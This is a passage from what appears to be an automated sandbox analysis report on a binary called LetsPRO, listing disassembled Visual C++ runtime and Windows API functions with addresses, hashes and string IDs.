                                        • GetModuleHandleW.KERNEL32(kernel32.dll,FlushProcessWriteBuffers), ref: 6C93BAA1
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C93BAA8
                                        • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 6C93BADB
                                        • std::exception::exception.LIBCMT(?,00000001), ref: 6C93BAFB
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C93BB28
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6C93BB43
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AllocCountCriticalInitializeSectionSpin$AddressConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionH_prolog3HandleLastModuleProcThrowVirtualstd::exception::exception
                                        • String ID: FlushProcessWriteBuffers$bad allocation$kernel32.dll
                                        • API String ID: 2685218194-103648123
                                        • Opcode ID: 8512541f5fe3043ea7cc76a303129eb429d1062316d2509eadd87b43405fb2cf
                                        • Instruction ID: 550bba2417f499c695f00192395074c3cadde8f9476f316881c2fa67c0765064
                                        • Opcode Fuzzy Hash: 8512541f5fe3043ea7cc76a303129eb429d1062316d2509eadd87b43405fb2cf
                                        • Instruction Fuzzy Hash: A1415BB1A00A26EFCB15CF65D845A9ABFB8FF19754F10851AE128D7A80C7B4E154CFE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C97E799 Relevance: 25.7, APIs: 17, Instructions: 171COMMON
                                        Download Yara Rule
                                        APIs
                                        • _lock.MSVCR100(0000000C,6C97E990,00000020), ref: 6C97E7B1
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C97E7E8
                                        • _calloc_crt.MSVCR100(?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 6C97E7FB
                                        • __cftoe.LIBCMT(?,00000000,00000000,?,7FFFFFFF,6C97E990,00000020), ref: 6C97E7CD
                                          • Part of subcall function 6C905E40: _wcstombs_s_l.MSVCR100(?,?,?,?,?,00000000), ref: 6C905E56
                                        • __cftoe.LIBCMT(00000000,00000000,?,?,000000FF,00000000,00000000,00000000,00000000,00000000), ref: 6C97E816
                                        • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C97E831
                                        • setlocale.MSVCR100(?,00000000,6C97E990,00000020), ref: 6C97E841
                                        • free.MSVCR100(00000000,?,00000000,6C97E990,00000020), ref: 6C97E84A
                                        • _getptd.MSVCR100 ref: 6C97E85B
                                        • _mbstowcs_s_l.MSVCR100(00000000,00000000,00000000,?,00000000,?), ref: 6C97E880
                                        • _malloc_crt.MSVCR100(?), ref: 6C97E8B9
                                        • _mbstowcs_s_l.MSVCR100(00000000,00000004,?,?,000000FF,?), ref: 6C97E8DD
                                        • free.MSVCR100(00000000), ref: 6C97E900
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C97E91E
                                        • free.MSVCR100(?), ref: 6C97E92B
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C97E94B
                                        • free.MSVCR100(?), ref: 6C97E958
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: free$DecrementInterlocked__cftoe_mbstowcs_s_l$CriticalEnterSection__invoke_watson_calloc_crt_getptd_lock_malloc_crt_wcstombs_s_lsetlocale
                                        • String ID:
                                        • API String ID: 662105381-0
                                        • Opcode ID: 538333c3fce8109adfc4a55e002932b4392266b8cdc877719b75ef09037c66bc
                                        • Instruction ID: b8f761e7d4a63fce221011600ec057b0755f8071ecf1d4a453a2a12b2bc7379d
                                        • Opcode Fuzzy Hash: 538333c3fce8109adfc4a55e002932b4392266b8cdc877719b75ef09037c66bc
                                        • Instruction Fuzzy Hash: 3651B572D02A08AECF319FA8C880DDD77F9AF59B18F34061AF425E2A51D736C5848B71
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9378DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 247timeCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _CxxThrowException.MSVCR100(?,6C9A0D0C), ref: 6C937943
                                          • Part of subcall function 6C918728: RaiseException.KERNEL32(?,?,6C92F35F,?,?,?,?,?,6C92F35F,?,6C90C8D8,6C9A8518), ref: 6C918767
                                        • std::exception::exception.LIBCMT ref: 6C93797D
                                        • ?wait@event@Concurrency@@QAEII@Z.MSVCR100(00000001,F3B6147F,00000000,?,?), ref: 6C937998
                                        • std::exception::exception.LIBCMT ref: 6C93792C
                                          • Part of subcall function 6C9736DA: std::exception::_Copy_str.LIBCMT(6C942185,?,?,6C942185,6C941FF3,?,6C941FF3,00000001), ref: 6C9736F5
                                        • std::exception::exception.LIBCMT ref: 6C9379D2
                                        • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR100(?,?,00000000,?,00000000,F3B6147F,00000000,?,?), ref: 6C937A39
                                          • Part of subcall function 6C93AEF0: __EH_prolog3.LIBCMT ref: 6C93AEF7
                                        • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100 ref: 6C937AAA
                                        • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100 ref: 6C937AFF
                                        • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,6C937E59,00000000,000000FF,00000000,00000020), ref: 6C937B69
                                        • CreateTimerQueueTimer.KERNEL32(00000010,00000000,6C937E59,00000000,000000FF,00000000,00000020), ref: 6C937B74
                                        • std::exception::exception.LIBCMT(?,00000001), ref: 6C937B90
                                        • ?Block@Context@Concurrency@@SAXXZ.MSVCR100 ref: 6C937BB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency@@$std::exception::exception$Timer$?unlock@critical_section@Exception$??0scoped_lock@critical_section@?wait@event@Block@Context@Copy_strCreateH_prolog3QueueQueue@details@RaiseSharedThrowV12@@std::exception::_
                                        • String ID: bad allocation$pEvents
                                        • API String ID: 3019020058-4135266256
                                        • Opcode ID: 008e8dd158ae4590522615ab7d4c45874afc47d812cf93a39a1ad7b96cd02137
                                        • Instruction ID: e681dd5af53ec02b7a0ae6be32dfe95f315ea2dae66a089084f8d91a8a0ba109
                                        • Opcode Fuzzy Hash: 008e8dd158ae4590522615ab7d4c45874afc47d812cf93a39a1ad7b96cd02137
                                        • Instruction Fuzzy Hash: CFA16E31108365DFC720CF24C680B9BB7F9FB95318F146A6DE8A99BA50D730D945CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90E360 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Name::operator+$NameName::
                                        • String ID: `anonymous namespace'
                                        • API String ID: 168861036-3062148218
                                        • Opcode ID: 108e7ca79b6a3c3431f5fc1cca3e8d27d810155d9d59457cda42b1e50492d3e7
                                        • Instruction ID: 8cd47d06344148ec592d2b5b69efeb5070ee54e8a69b7e50000fd1b69c57a602
                                        • Opcode Fuzzy Hash: 108e7ca79b6a3c3431f5fc1cca3e8d27d810155d9d59457cda42b1e50492d3e7
                                        • Instruction Fuzzy Hash: C6816E71B05658AFDB10CBA8D890AEEBBF9EF29704F44446EE4D597B40EB30D948CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93C227 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 224COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,?,?,6C93BB24), ref: 6C93C261
                                        • _memset.LIBCMT(00000000,00000000,00000024,00000000,00000000,?,?,6C93BB24), ref: 6C93C26D
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000024,00000000,00000000,?,?,6C93BB24), ref: 6C93C284
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000000,00000024,00000000,00000000,?,?,6C93BB24), ref: 6C93C2A2
                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,6C93BB24), ref: 6C93C2CA
                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 6C93C2D1
                                        • _memset.LIBCMT(00000002,00000000,?,?,?,?,?,?,00000000,?,?,6C93BB24), ref: 6C93C2ED
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000002,00000000,?,?,?,?,?,?,00000000,?,?,6C93BB24), ref: 6C93C30D
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,?,?,6C93BB24), ref: 6C93C358
                                        • _memset.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,6C93BB24), ref: 6C93C369
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,?,?,6C93BB24), ref: 6C93C380
                                        • free.MSVCR100(?,?,?,?,?,00000000,?,?,6C93BB24), ref: 6C93C491
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memset$Process$AffinityCurrentMaskfree
                                        • String ID: $$$
                                        • API String ID: 3179535153-233714265
                                        • Opcode ID: ebb301ca2eb5f32599b25d878651c808801bd1f46a1305a796a69dcc5ac47545
                                        • Instruction ID: 97aa7f9216331ec84c534d5c9798baef32203ecb0dd486636febea59613b3055
                                        • Opcode Fuzzy Hash: ebb301ca2eb5f32599b25d878651c808801bd1f46a1305a796a69dcc5ac47545
                                        • Instruction Fuzzy Hash: E481ADB1A02625EFCB08DFA8D9888ADB7B8FF49304720915FE406DBA40D771E851CF95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C97EEB3 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 185stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C90072C: GetLastError.KERNEL32(6C8F3238,?,6C90084A,6C998136), ref: 6C900730
                                          • Part of subcall function 6C90072C: __set_flsgetvalue.MSVCR100 ref: 6C90073E
                                          • Part of subcall function 6C90072C: SetLastError.KERNEL32(00000000), ref: 6C900750
                                        • _calloc_crt.MSVCR100(00000086,00000001), ref: 6C97EEDC
                                        • strcpy_s.MSVCR100(?,00000086,00000000,?), ref: 6C97EF02
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C97EF17
                                        • _errno.MSVCR100(?,?,?,6C97DBA9,00000000,?,00000000), ref: 6C97EF6E
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,6C97DBA9,00000000,?,00000000), ref: 6C97EF78
                                        • __get_sys_err_msg.LIBCMT ref: 6C97EEFA
                                          • Part of subcall function 6C97C364: __sys_nerr.MSVCR100(?,?,6C97C41C,00000000), ref: 6C97C371
                                          • Part of subcall function 6C97C364: __sys_nerr.MSVCR100(?,?,6C97C41C,00000000), ref: 6C97C37A
                                          • Part of subcall function 6C97C364: __sys_errlist.MSVCR100(?,?,6C97C41C,00000000), ref: 6C97C381
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast__sys_nerr$__get_sys_err_msg__invoke_watson__set_flsgetvalue__sys_errlist_calloc_crt_errno_invalid_parameter_noinfostrcpy_s
                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                        • API String ID: 1851745123-798102604
                                        • Opcode ID: e6de565caa316b65bedf7f3251ab40c97a36afca630aed10675d4050c5c12bbe
                                        • Instruction ID: bd0b933c2ee13f135dc00c17f97daab7246596e511392e77c228cd7936aef181
                                        • Opcode Fuzzy Hash: e6de565caa316b65bedf7f3251ab40c97a36afca630aed10675d4050c5c12bbe
                                        • Instruction Fuzzy Hash: E241573260B265AF9B319B659C448EF7F7CEF22768B200569F418A6E51E730C920C3F4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C906AE1 Relevance: 24.2, APIs: 16, Instructions: 234stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ___crtGetStringTypeA.LIBCMT ref: 6C9069F7
                                        • memcmp.MSVCR100(?,000000FE), ref: 6C906AB4
                                        • _getptd.MSVCR100(00000001,00000000), ref: 6C906B09
                                        • __expandlocale.LIBCMT ref: 6C906B31
                                          • Part of subcall function 6C905101: _getptd.MSVCR100(00000000,00000000,00000005), ref: 6C905137
                                          • Part of subcall function 6C905101: strcpy_s.MSVCR100(00000000,00000000,6C9051E0,00000000,00000000,00000005), ref: 6C9051A5
                                        • strcmp.MSVCR100(?,?,?,?,?,?,00000001,00000000), ref: 6C906B50
                                        • _strlen.LIBCMT(?,?,?,?,?,00000001,00000000), ref: 6C906B66
                                        • _malloc_crt.MSVCR100(-00000005,?,?,?,?,?,00000001,00000000), ref: 6C906B75
                                          • Part of subcall function 6C900B61: malloc.MSVCR100(00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C900B6D
                                        • memcpy.MSVCR100(?,?,00000006,?,?,?,?,00000001,00000000), ref: 6C906BC3
                                        • strcpy_s.MSVCR100(?,?,?,?,?,00000006,?,?,?,?,00000001,00000000), ref: 6C906BEC
                                        • memcpy.MSVCR100(?,?,00000006,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 6C906C26
                                        • _CRT_RTC_INITW.MSVCR100(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 6C906C52
                                        • InterlockedDecrement.KERNEL32(00000000), ref: 6C906C7B
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C930CCC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _getptdmemcpystrcpy_s$DecrementInterlockedStringType___crt__expandlocale__invoke_watson_malloc_crt_strlenmallocmemcmpstrcmp
                                        • String ID:
                                        • API String ID: 986606718-0
                                        • Opcode ID: f99d7bbce83f819edbacdca5ac2d9d1da8309be5d633f9e017484996a5eaaeb8
                                        • Instruction ID: 406d555e3fb891713bd6cf5b82efea6cbceee54381c9a5d158f6f49f33d8af3e
                                        • Opcode Fuzzy Hash: f99d7bbce83f819edbacdca5ac2d9d1da8309be5d633f9e017484996a5eaaeb8
                                        • Instruction Fuzzy Hash: 71A115B1A012199FDB24CF28C891BE9B7B4FF59304F1044AAE91DE7650EB31EA84CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C902237 Relevance: 24.2, APIs: 16, Instructions: 165COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _fileno$__fassignisleadbyte
                                        • String ID:
                                        • API String ID: 3459433188-0
                                        • Opcode ID: fb5526daf3ed45fcbca222fd4f01a74cded78434030602d636dc7150fe9006d4
                                        • Instruction ID: 0759caf805b1b16af250ac36806379d2ef1eebe6e7a121d7b61bf66fb8a727fb
                                        • Opcode Fuzzy Hash: fb5526daf3ed45fcbca222fd4f01a74cded78434030602d636dc7150fe9006d4
                                        • Instruction Fuzzy Hash: 22514732209A94DAC3195B3CD8449AD3BA8AF33738730070EE5B48AED1DB34D246C7A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93FCB7 Relevance: 24.1, APIs: 16, Instructions: 111memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C93FCBE
                                        • ??0SchedulerPolicy@Concurrency@@QAE@ABV01@@Z.MSVCR100(?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?,00000000,6C9A55DC,?,00000004,6C940478,6C9A55E0,0000000C,6C9403B2), ref: 6C93FCD7
                                          • Part of subcall function 6C942110: ??2@YAPAXI@Z.MSVCR100(00000024,00000000,?,6C93FCDC,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?,00000000,6C9A55DC,?,00000004), ref: 6C94211A
                                          • Part of subcall function 6C942110: memcpy.MSVCR100(00000000,?,00000024,00000024,00000000,?,6C93FCDC,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?,00000000), ref: 6C942129
                                          • Part of subcall function 6C941D71: ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,6C93FCF4,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?,00000000,6C9A55DC,?,00000004), ref: 6C941DB5
                                          • Part of subcall function 6C941D71: _memset.LIBCMT(00000000,00000000,?,00000000,?,00000000,6C93FCF4,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?,00000000), ref: 6C941DC5
                                          • Part of subcall function 6C941D71: ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,?,00000000,6C93FCF4,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?), ref: 6C941DCC
                                          • Part of subcall function 6C941D71: ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6C941DFA
                                          • Part of subcall function 6C941D71: InitializeSListHead.KERNEL32(?), ref: 6C941E0F
                                          • Part of subcall function 6C941D71: InitializeSListHead.KERNEL32(?), ref: 6C941E15
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?,00000000,6C9A55DC,?,00000004,6C940478,6C9A55E0,0000000C), ref: 6C93FD07
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?), ref: 6C93FDA9
                                        • InitializeSListHead.KERNEL32(?), ref: 6C93FDCE
                                        • InitializeSListHead.KERNEL32(?), ref: 6C93FDD7
                                        • InitializeSListHead.KERNEL32(?), ref: 6C93FDE0
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000000), ref: 6C93FDE6
                                          • Part of subcall function 6C942161: std::exception::exception.LIBCMT(6C941FF3,?,6C941FF3,00000001), ref: 6C942180
                                          • Part of subcall function 6C942161: _CxxThrowException.MSVCR100(?,6C9A0EAC,6C941FF3), ref: 6C942195
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000004,00000000), ref: 6C93FDF3
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000007,00000004,00000000), ref: 6C93FE01
                                          • Part of subcall function 6C93B79F: __EH_prolog3.LIBCMT ref: 6C93B7A6
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000007,00000004,00000000), ref: 6C93FE15
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000002,00000007,00000004,00000000), ref: 6C93FE32
                                        • TlsAlloc.KERNEL32(00000002,00000002,00000007,00000004,00000000), ref: 6C93FE3D
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C9454B2), ref: 6C93FE4B
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C93FE63
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C93FE71
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Policy$Initialize$Concurrency@@Policy@Scheduler$ElementHeadKey@2@@ListValue@$??2@CountCriticalExceptionH_prolog3SectionSpinThrow$AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastV01@@_memsetmemcpystd::exception::exception
                                        • String ID:
                                        • API String ID: 4135718791-0
                                        • Opcode ID: a85360e6507b98137c0087fed32276d7eee6dd7aae91f538cbfc1f762e6a2b3a
                                        • Instruction ID: ae130bdde0185e4835a016e97767d3016cc5e7d11a649f47f45a18559d44f3de
                                        • Opcode Fuzzy Hash: a85360e6507b98137c0087fed32276d7eee6dd7aae91f538cbfc1f762e6a2b3a
                                        • Instruction Fuzzy Hash: E351D5B1A00A56EBCB18DFB5C884BD9FBA5BF18314F50862ED52D97B80C734A564CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90BD17 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 223COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _wsopen_s.MSVCR100(?,?,00000000,?,00000180,00000000,?,?), ref: 6C90BDE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _wsopen_s
                                        • String ID: UNICODE$UTF-16LE$UTF-8$ccs
                                        • API String ID: 2316899696-3573488595
                                        • Opcode ID: ae7bdc205c681d9b655063cfaa18fab804b13840ee0f3bc25eea2d797a1e3c9e
                                        • Instruction ID: 835d3b851f986c71927f90d6487f39654e86c22310cf9f007562cbaaaa2494d9
                                        • Opcode Fuzzy Hash: ae7bdc205c681d9b655063cfaa18fab804b13840ee0f3bc25eea2d797a1e3c9e
                                        • Instruction Fuzzy Hash: 81714AB2F59309DADB105F6988457A9B7B8FF12308F15416DDD5497E80E3B4CA80CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C95386B Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 216COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(?,00000000), ref: 6C9538A1
                                        • _invalid_parameter_noinfo.MSVCR100(?,00000000), ref: 6C9538AC
                                        • __fassign.LIBCMT(ccs,?,00000003,?,?,00000000), ref: 6C953A1E
                                        • __fassign.LIBCMT(?,UTF-8,00000005,?,?,00000000), ref: 6C953A48
                                        • __fassign.LIBCMT(?,UTF-16LE,00000008,?,?,?,?,?,00000000), ref: 6C953A67
                                        • __fassign.LIBCMT(?,UNICODE,00000007,?,?,?,?,?,?,?,?,00000000), ref: 6C953A86
                                        • _errno.MSVCR100(?,?,00000000), ref: 6C953AA8
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,00000000), ref: 6C953AB3
                                        • __wsopen_s.LIBCMT(?,?,00000109,?,00000180,?,?,00000000), ref: 6C953ACA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
